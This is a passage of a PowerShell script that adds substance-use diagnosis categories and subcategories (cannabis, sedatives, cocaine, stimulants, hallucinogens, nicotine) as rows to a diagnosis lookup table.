with unspecified cannabis-induced disorder","Cannabis dependence with unspecified cannabis-induced disorder") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified","Cannabis use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with intoxication","Cannabis use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with intoxication","Cannabis use, unspecified with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with intoxication","Cannabis use, unspecified with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with intoxication","Cannabis use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with psychotic disorder","Cannabis use, unspecified with psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with psychotic disorder","Cannabis use, unspecified with psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with psychotic disorder","Cannabis use, unspecified with psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with other cannabis-induced disorder","Cannabis use, unspecified with anxiety disorder") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with other cannabis-induced disorder","Cannabis use, unspecified with other cannabis-induced disorder") + $null = $DiagnosisList.Rows.Add("Cannabis use, unspecified with unspecified cannabis-induced disorder","Cannabis use, unspecified with unspecified cannabis-induced disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic-related abuse","Sedative, hypnotic or anxiolytic abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic-related abuse","Sedative, hypnotic or anxiolytic abuse, in remission") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with intoxication","Sedative, hypnotic or anxiolytic abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with intoxication","Sedative, hypnotic or anxiolytic abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with intoxication","Sedative, hypnotic or anxiolytic abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced mood disorder","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic abuse with sedative, hypnotic or anxiolytic-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic abuse with other sedative, hypnotic or anxiolytic-induced disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic abuse with unspecified sedative, hypnotic or anxiolytic-induced disorder","Sedative, hypnotic or anxiolytic abuse with unspecified sedative, hypnotic or anxiolytic-induced disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic-related dependence","Sedative, hypnotic or anxiolytic dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic-related dependence","Sedative, hypnotic or anxiolytic dependence, in remission") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with intoxication","Sedative, hypnotic or anxiolytic dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with intoxication","Sedative, hypnotic or anxiolytic dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with intoxication","Sedative, hypnotic or anxiolytic dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with withdrawal","Sedative, hypnotic or anxiolytic dependence with withdrawal, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with withdrawal","Sedative, hypnotic or anxiolytic dependence with withdrawal delirium") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with withdrawal","Sedative, hypnotic or anxiolytic dependence with withdrawal with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with withdrawal","Sedative, hypnotic or anxiolytic dependence with withdrawal, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced mood disorder","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced persisting amnestic disorder","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced persisting dementia","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic dependence with sedative, hypnotic or anxiolytic-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic dependence with other sedative, hypnotic or anxiolytic-induced disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic dependence with unspecified sedative, hypnotic or anxiolytic-induced disorder","Sedative, hypnotic or anxiolytic dependence with unspecified sedative, hypnotic or anxiolytic-induced disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic-related use, unspecified","Sedative, hypnotic, or anxiolytic use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with intoxication","Sedative, hypnotic or anxiolytic use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with intoxication","Sedative, hypnotic or anxiolytic use, unspecified with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with intoxication","Sedative, hypnotic or anxiolytic use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with withdrawal","Sedative, hypnotic or anxiolytic use, unspecified with withdrawal, uncomplicated") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with withdrawal","Sedative, hypnotic or anxiolytic use, unspecified with withdrawal delirium") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with withdrawal","Sedative, hypnotic or anxiolytic use, unspecified with withdrawal with perceptual disturbances") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with withdrawal","Sedative, hypnotic or anxiolytic use, unspecified with withdrawal, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced mood disorder","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced psychotic disorder","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced persisting amnestic disorder","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced persisting amnestic disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced persisting dementia","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced persisting dementia") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic use, unspecified with sedative, hypnotic or anxiolytic-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with other sedative, hypnotic or anxiolytic-induced disorders","Sedative, hypnotic or anxiolytic use, unspecified with other sedative, hypnotic or anxiolytic-induced disorder") + $null = $DiagnosisList.Rows.Add("Sedative, hypnotic or anxiolytic use, unspecified with unspecified sedative, hypnotic or anxiolytic-induced disorder","Sedative, hypnotic or anxiolytic use, unspecified with unspecified sedative, hypnotic or anxiolytic-induced disorder") + $null = $DiagnosisList.Rows.Add("Cocaine abuse","Cocaine abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cocaine abuse","Cocaine abuse, in remission") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with intoxication","Cocaine abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with intoxication","Cocaine abuse with intoxication with delirium") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with intoxication","Cocaine abuse with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with intoxication","Cocaine abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with cocaine-induced mood disorder","Cocaine abuse with cocaine-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with cocaine-induced psychotic disorder","Cocaine abuse with cocaine-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with cocaine-induced psychotic disorder","Cocaine abuse with cocaine-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with cocaine-induced psychotic disorder","Cocaine abuse with cocaine-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with other cocaine-induced disorder","Cocaine abuse with cocaine-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with other cocaine-induced disorder","Cocaine abuse with cocaine-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with other cocaine-induced disorder","Cocaine abuse with cocaine-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with other cocaine-induced disorder","Cocaine abuse with other cocaine-induced disorder") + $null = $DiagnosisList.Rows.Add("Cocaine abuse with unspecified cocaine-induced disorder","Cocaine abuse with unspecified cocaine-induced disorder") + $null = $DiagnosisList.Rows.Add("Cocaine dependence","Cocaine dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cocaine dependence","Cocaine dependence, in remission") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with intoxication","Cocaine dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with intoxication","Cocaine dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with intoxication","Cocaine dependence with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with intoxication","Cocaine dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with withdrawal","Cocaine dependence with withdrawal") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with cocaine-induced mood disorder","Cocaine dependence with cocaine-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with cocaine-induced psychotic disorder","Cocaine dependence with cocaine-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with cocaine-induced psychotic disorder","Cocaine dependence with cocaine-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with cocaine-induced psychotic disorder","Cocaine dependence with cocaine-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with other cocaine-induced disorder","Cocaine dependence with cocaine-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with other cocaine-induced disorder","Cocaine dependence with cocaine-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with other cocaine-induced disorder","Cocaine dependence with cocaine-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with other cocaine-induced disorder","Cocaine dependence with other cocaine-induced disorder") + $null = $DiagnosisList.Rows.Add("Cocaine dependence with unspecified cocaine-induced disorder","Cocaine dependence with unspecified cocaine-induced disorder") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified","Cocaine use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with intoxication","Cocaine use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with intoxication","Cocaine use, unspecified with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with intoxication","Cocaine use, unspecified with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with intoxication","Cocaine use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with cocaine-induced mood disorder","Cocaine use, unspecified with cocaine-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with cocaine-induced psychotic disorder","Cocaine use, unspecified with cocaine-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with cocaine-induced psychotic disorder","Cocaine use, unspecified with cocaine-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with cocaine-induced psychotic disorder","Cocaine use, unspecified with cocaine-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with other specified cocaine-induced disorder","Cocaine use, unspecified with cocaine-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with other specified cocaine-induced disorder","Cocaine use, unspecified with cocaine-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with other specified cocaine-induced disorder","Cocaine use, unspecified with cocaine-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with other specified cocaine-induced disorder","Cocaine use, unspecified with other cocaine-induced disorder") + $null = $DiagnosisList.Rows.Add("Cocaine use, unspecified with unspecified cocaine-induced disorder","Cocaine use, unspecified with unspecified cocaine-induced disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse","Other stimulant abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse","Other stimulant abuse, in remission") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with intoxication","Other stimulant abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with intoxication","Other stimulant abuse with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with intoxication","Other stimulant abuse with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with intoxication","Other stimulant abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with stimulant-induced mood disorder","Other stimulant abuse with stimulant-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with stimulant-induced psychotic disorder","Other stimulant abuse with stimulant-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with stimulant-induced psychotic disorder","Other stimulant abuse with stimulant-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with stimulant-induced psychotic disorder","Other stimulant abuse with stimulant-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with other stimulant-induced disorder","Other stimulant abuse with stimulant-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with other stimulant-induced disorder","Other stimulant abuse with stimulant-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with other stimulant-induced disorder","Other stimulant abuse with stimulant-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with other stimulant-induced disorder","Other stimulant abuse with other stimulant-induced disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant abuse with unspecified stimulant-induced disorder","Other stimulant abuse with unspecified stimulant-induced disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence","Other stimulant dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence","Other stimulant dependence, in remission") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with intoxication","Other stimulant dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with intoxication","Other stimulant dependence with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with intoxication","Other stimulant dependence with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with intoxication","Other stimulant dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with withdrawal","Other stimulant dependence with withdrawal") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with stimulant-induced mood disorder","Other stimulant dependence with stimulant-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with stimulant-induced psychotic disorder","Other stimulant dependence with stimulant-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with stimulant-induced psychotic disorder","Other stimulant dependence with stimulant-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with stimulant-induced psychotic disorder","Other stimulant dependence with stimulant-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with other stimulant-induced disorder","Other stimulant dependence with stimulant-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with other stimulant-induced disorder","Other stimulant dependence with stimulant-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with other stimulant-induced disorder","Other stimulant dependence with stimulant-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with other stimulant-induced disorder","Other stimulant dependence with other stimulant-induced disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant dependence with unspecified stimulant-induced disorder","Other stimulant dependence with unspecified stimulant-induced disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified","Other stimulant use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with intoxication","Other stimulant use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with intoxication","Other stimulant use, unspecified with intoxication delirium") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with intoxication","Other stimulant use, unspecified with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with intoxication","Other stimulant use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with withdrawal","Other stimulant use, unspecified with withdrawal") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with stimulant-induced mood disorder","Other stimulant use, unspecified with stimulant-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with stimulant-induced psychotic disorder","Other stimulant use, unspecified with stimulant-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with stimulant-induced psychotic disorder","Other stimulant use, unspecified with stimulant-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with stimulant-induced psychotic disorder","Other stimulant use, unspecified with stimulant-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with other stimulant-induced disorder","Other stimulant use, unspecified with stimulant-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with other stimulant-induced disorder","Other stimulant use, unspecified with stimulant-induced sexual dysfunction") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with other stimulant-induced disorder","Other stimulant use, unspecified with stimulant-induced sleep disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with other stimulant-induced disorder","Other stimulant use, unspecified with other stimulant-induced disorder") + $null = $DiagnosisList.Rows.Add("Other stimulant use, unspecified with unspecified stimulant-induced disorder","Other stimulant use, unspecified with unspecified stimulant-induced disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse","Hallucinogen abuse, uncomplicated") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse","Hallucinogen abuse, in remission") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with intoxication","Hallucinogen abuse with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with intoxication","Hallucinogen abuse with intoxication with delirium") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with intoxication","Hallucinogen abuse with intoxication with perceptual disturbance") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with intoxication","Hallucinogen abuse with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with hallucinogen-induced mood disorder","Hallucinogen abuse with hallucinogen-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with hallucinogen-induced psychotic disorder","Hallucinogen abuse with hallucinogen-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with hallucinogen-induced psychotic disorder","Hallucinogen abuse with hallucinogen-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with hallucinogen-induced psychotic disorder","Hallucinogen abuse with hallucinogen-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with other hallucinogen-induced disorder","Hallucinogen abuse with hallucinogen-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with other hallucinogen-induced disorder","Hallucinogen abuse with hallucinogen persisting perception disorder (flashbacks)") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with other hallucinogen-induced disorder","Hallucinogen abuse with other hallucinogen-induced disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen abuse with unspecified hallucinogen-induced disorder","Hallucinogen abuse with unspecified hallucinogen-induced disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence","Hallucinogen dependence, uncomplicated") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence","Hallucinogen dependence, in remission") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with intoxication","Hallucinogen dependence with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with intoxication","Hallucinogen dependence with intoxication with delirium") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with intoxication","Hallucinogen dependence with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with hallucinogen-induced mood disorder","Hallucinogen dependence with hallucinogen-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with hallucinogen-induced psychotic disorder","Hallucinogen dependence with hallucinogen-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with hallucinogen-induced psychotic disorder","Hallucinogen dependence with hallucinogen-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with hallucinogen-induced psychotic disorder","Hallucinogen dependence with hallucinogen-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with other hallucinogen-induced disorder","Hallucinogen dependence with hallucinogen-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with other hallucinogen-induced disorder","Hallucinogen dependence with hallucinogen persisting perception disorder (flashbacks)") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with other hallucinogen-induced disorder","Hallucinogen dependence with other hallucinogen-induced disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen dependence with unspecified hallucinogen-induced disorder","Hallucinogen dependence with unspecified hallucinogen-induced disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified","Hallucinogen use, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with intoxication","Hallucinogen use, unspecified with intoxication, uncomplicated") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with intoxication","Hallucinogen use, unspecified with intoxication with delirium") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with intoxication","Hallucinogen use, unspecified with intoxication, unspecified") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with hallucinogen-induced mood disorder","Hallucinogen use, unspecified with hallucinogen-induced mood disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with hallucinogen-induced psychotic disorder","Hallucinogen use, unspecified with hallucinogen-induced psychotic disorder with delusions") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with hallucinogen-induced psychotic disorder","Hallucinogen use, unspecified with hallucinogen-induced psychotic disorder with hallucinations") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with hallucinogen-induced psychotic disorder","Hallucinogen use, unspecified with hallucinogen-induced psychotic disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with other specified hallucinogen-induced disorder","Hallucinogen use, unspecified with hallucinogen-induced anxiety disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with other specified hallucinogen-induced disorder","Hallucinogen use, unspecified with hallucinogen persisting perception disorder (flashbacks)") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with other specified hallucinogen-induced disorder","Hallucinogen use, unspecified with other hallucinogen-induced disorder") + $null = $DiagnosisList.Rows.Add("Hallucinogen use, unspecified with unspecified hallucinogen-induced disorder","Hallucinogen use, unspecified with unspecified hallucinogen-induced disorder") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, unspecified","Nicotine dependence, unspecified, uncomplicated") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, unspecified","Nicotine dependence, unspecified, in remission") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, unspecified","Nicotine dependence unspecified, with withdrawal") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, unspecified","Nicotine dependence, unspecified, with other nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, unspecified","Nicotine dependence, unspecified, with unspecified nicotine-induced disorders") + $null = $DiagnosisList.Rows.Add("Nicotine dependence, cigarettes","Nicotine dependence, cigarettes, 